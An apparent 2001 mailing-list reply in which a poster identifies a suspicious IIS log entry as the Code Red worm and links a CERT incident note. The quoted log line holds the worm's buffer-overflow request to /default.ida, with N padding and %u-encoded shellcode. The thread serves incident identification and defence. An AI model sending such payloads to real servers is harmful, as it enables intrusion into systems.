Re: CGI Buffer Overflow?

MH Thu, 19 Jul 2001 17:29:00 -0700
>>>>> "Brian" == Brian Rectanus <[EMAIL PROTECTED]> writes:

    Brian> Anyone seen this before?  I have looked around for similar
    Brian> attacks, but cannot find any info.  I assume that is a
    Brian> unicode string padded out with Ns.  How would I go about
    Brian> finding out what is in the string?


    Brian> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
    Brian> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    Brian> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
    Brian> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
    Brian> 078%u0000%u00=a HTTP/1.0" 400 328

"Code Red"  --> IIS

http://www.cert.org/incident_notes/IN-2001-08.html

Seems to be  quiet efficient, seven attempts so far ... 

-- 
(Dr.) Michael Hummel
mailto: [EMAIL PROTECTED] || [EMAIL PROTECTED]
--
fprint = F24D EAC6 E3D7 372C 9122 D510 EB24 01CA 0B56 B518
id: 1024D/0B56B518 key: http://www.seitung.net/key
PGP signature
Re: CGI Buffer Overflow?

Reply via email to
